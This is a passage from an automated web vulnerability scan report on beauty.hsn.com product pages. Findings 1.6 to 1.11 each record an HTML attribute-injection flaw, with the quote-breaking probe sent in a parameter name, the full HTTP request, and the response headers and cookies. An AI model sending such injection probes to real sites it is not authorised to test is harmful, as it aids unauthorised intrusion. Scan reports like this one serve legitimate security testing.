Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:40 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdXZc3mE8xUW4&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx%3f846b9%22%2520a%253db%252068a419e1b84%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=q801YuowZ%2bjhiTKP7X%2byzg%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:41 GMT; path=/
Set-Cookie: sessionid=id=PVsTDBL4M6VsT5TkEgaVjx1T%2b6cFDZdqFQJScA29k476s5oFzVsCHA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=od6NPBkg9eYa94p41V%2ftAJa1%2fWN%2fuoY%2fAjCMUoYTQ49XJyLoGyFIeQ%3d%3d&abtid=rcqsP4B%2f5lxU4k2YSnrVOqkNHn0YLVxqifWo1bh1Bj%2bBO2%2fgqjsylQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:40 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:41 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=z0RsEvH%2fkMM2grqqLWT0faWzkFoWfzMFkz%2feC%2bsfVNw%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=06CE239045B453A924D30188EC479E4D; domain=.hsn.com; path=/
Set-Cookie: TLTHID=06CE239045B453A924D30188EC479E4D; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 132550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
p://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-eau-de-parfum-and-clutch-set_p-6076324_xp.aspx?846b9" a=b 68a419e1b84=1&cm_mmc=sharingsite*email*PD*958202"
shareTitle="My Life&#174; Mary J. Blige Eau de Parfum and Clutch Set - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.6. http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf37a"%20a%3db%20d1e776cafa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf37a" a=b d1e776cafa1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx?bf37a"%20a%3db%20d1e776cafa1=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:34 GMT; path=/
Set-Cookie: customer=ksUrl=MN4mbmq89OqyBYkGnxtEdQn8exkmbtGl&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx%3fbf37a%22%2520a%253db%2520d1e776cafa1%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=CNJteWmoJh2q5VScWDRUTQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:34 GMT; path=/
Set-Cookie: sessionid=id=3pLTW3IkU7t2VQE7A%2fkwLuXTUv6LaBR0nG1XBGt5Q%2fXGQSANqdRk%2bw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=uudE7M4ISY409wuMWJGeu4RHnQEwDYGYp51IWycQCjFJiUg8jwP3rw%3d%3d&abtid=W%2baYu7R3ONGbAYB%2b9FULmL6lXDq%2fEP8vC9dId%2bdjk3qPeHn9eWC0mQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:34 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=cii9xGFgK%2ff0yiMZE6UtnaLLMz%2b3Ff2ukRD38qFldvY%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=8689FAEC4C2C23C53FB53C880FE114B3; domain=.hsn.com; path=/
Set-Cookie: TLTHID=8689FAEC4C2C23C53FB53C880FE114B3; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 124149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx?bf37a" a=b d1e776cafa1=1&cm_mmc=sharingsite*email*PD*104619"
shareTitle="My Life&#174; Mary J. Blige Holiday Gift Set - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"
sty
...[SNIP]...

1.7. http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8967f"%20a%3db%2016ada4605a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8967f" a=b 16ada4605a3 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx?8967f"%20a%3db%2016ada4605a3=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:41 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2fO5D1o8L2Tv2icTPfS1mQe&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fsignature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx%3f8967f%22%2520a%253db%252016ada4605a3%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=dCJHGOPMFPSSrCvKz6ZVGw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:41 GMT; path=/
Set-Cookie: sessionid=id=zP1kghhy1YeD%2bgqe7k0w8YO4Wub9SmnGZu4yRCFm5bIKnFRpKujOaA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=FZ5vA5%2bl3PuEE%2bIXbm9Dfdyu5cGR9JzgpeOkaBhq5uPKyR9XLVddOw%3d%3d&abtid=yMLuUBProkmnaFxc0c57mlnWyUMX5F8KIxD4dRv1TVmS4rYNMHVYyg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:41 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:41 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=09JRRTo4KD6UN7njW31fEkdRR%2b2erly0mNd689mOCjk%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=878EA7FC44E607B3C5B8AA99A06C8DD9; domain=.hsn.com; path=/
Set-Cookie: TLTHID=878EA7FC44E607B3C5B8AA99A06C8DD9; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 147805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
ail_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx?8967f" a=b 16ada4605a3=1&cm_mmc=sharingsite*email*PD*100328"
shareTitle="Signature Club A by Adrienne Jet Tech Wet Set Perfect Beauty Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.8. http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60ab6"%20a%3db%2073a87a02b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60ab6" a=b 73a87a02b3a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx?60ab6"%20a%3db%2073a87a02b3a=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:58 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm%2b0IarggmdmY&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx%3f60ab6%22%2520a%253db%252073a87a02b3a%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyigtQ9g3UAgyTQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:59 GMT; path=/
Set-Cookie: sessionid=id=Y5GMv%2bU%2fvKHSDfb%2baCHTuzGsDrdJcyFByA%2fy4bH9%2fzL8C8%2bxYS5ajg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=SbTZZTQmS8bXJBnQGEBIClr3%2bTcCUMUPGixYnmPdf76sRx%2f%2bg%2b4tvg%3d%3d&abtid=NZfg5idBeUl8YRvMSASJt%2bWN5Ul6f1Gn%2b78957ABAI3%2bfN9E7k%2b1Fg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:58 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:59 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=w87nNKyKUJmfyM%2fj%2fEMyUEeKxr%2brbtZtcp%2bzXx0W%2fPE%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=DC6C8E2B420515F575BC32955F7C400F; domain=.hsn.com; path=/
Set-Cookie: TLTHID=DC6C8E2B420515F575BC32955F7C400F; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx?60ab6" a=b 73a87a02b3a=1&cm_mmc=sharingsite*email*PD*968215"
shareTitle="Wei East 3 Perfect Gifts for Hands &amp; Body at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="backgr
...[SNIP]...

1.9. http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50bf"%20a%3db%2084a1305fdee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c50bf" a=b 84a1305fdee in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx?c50bf"%20a%3db%2084a1305fdee=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:56 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy81O%2fWenidlgG13HQdI25Ls&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-all-in-one-ageless-duo_p-6059427_xp.aspx%3fc50bf%22%2520a%253db%252084a1305fdee%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=PTZbYsFP8Jcoar2cu5uNZQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: sessionid=id=4Djw26KVZP1hzf%2bagWnEUXCNo%2fkxginPjDuaEO3eiHeDWPTuk6wuYQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=j7Koq1qPRCEATWAmr%2b0ezCgNGIc9hi%2bCb0dIDKWVKooAVAizMu%2bHUg%3d%3d&abtid=oWrHmW6YQxK4NAX4Pmr1oO2CyfOowl511hX5RaTQabbXXXdVowVVIw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=3IpwWH9dKpSAVto8yWKYavBw1xKSMR103PjdwdzyvPQ%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=275135544D469242180CE39534AFB92C; domain=.hsn.com; path=/
Set-Cookie: TLTHID=275135544D469242180CE39534AFB92C; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 140183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx?c50bf" a=b 84a1305fdee=1&cm_mmc=sharingsite*email*PD*956788"
shareTitle="Wei East All In One Ageless Duo at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position:
...[SNIP]...

1.10. http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c46b"%20a%3db%2080a0863242e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c46b" a=b 80a0863242e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx?3c46b"%20a%3db%2080a0863242e=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:48 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy8083ZxSsiTi7uZOgPdXID0&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx%3f3c46b%22%2520a%253db%252080a0863242e%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=ESKxso7z%2fWverdybCuzVkQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:49 GMT; path=/
Set-Cookie: sessionid=id=v%2bpj0M6B47jQrIsfaC%2ft%2fbb0fxKO3hxlw9vYI9lrS%2butqtlG4mtyGQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=XaM12Sn3m2ETUnd3bHVVZWGq2CnYvEkAivcUpXv0dBu8uJyCe12XSw%3d%3d&abtid=7%2fjqK9uGEavMxT3FXl6r0naVlOCjIEleVmH4x9UJJSvCkU3ln%2bATpw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:48 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:49 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=HRGccXlUJ9DeJ15fxYDg%2fZ0ARTvjGRC%2bTW72pH%2fCm0o%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=A5B96CD64D09C38576D204ACA2F3702B; domain=.hsn.com; path=/
Set-Cookie: TLTHID=A5B96CD64D09C38576D204ACA2F3702B; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx?3c46b" a=b 80a0863242e=1&cm_mmc=sharingsite*email*PD*963768"
shareTitle="Wei East Discover Chestnut Neck &amp; Decolletage Restore Cream Duo at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.11. http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c813"%20a%3db%20941dc2f6ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c813" a=b 941dc2f6ef4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx?8c813"%20a%3db%20941dc2f6ef4=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:55 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm3ieS89ivWzl&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx%3f8c813%22%2520a%253db%2520941dc2f6ef4%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2Deknegkyih9Ivj54mYDrw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: sessionid=id=lin7%2fVsJFd5DTGuJG76NI8KIdcdlg0jnCEtpGxOo0djehYE4pgCUeQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=yZwu1ApC99PO8ve9wjKuCl%2fgkw9cDIpR%2b3yM8Alc4mCFXm0eKqNYdQ%3d%3d&abtid=gVeKY6LQIodXXcPYfmWJQKoUYL2Lh9hsjwmtTUOb8%2bdXDMM7FelRcg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:55 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=ysNcD%2bsFDvKL3M0dd6d2mTeSMrOyZswZi4%2b%2bBGPULbA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=070DA9DC4158BA9CEE1A20B63D272430; domain=.hsn.com; path=/
Set-Cookie: TLTHID=070DA9DC4158BA9CEE1A20B63D272430; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
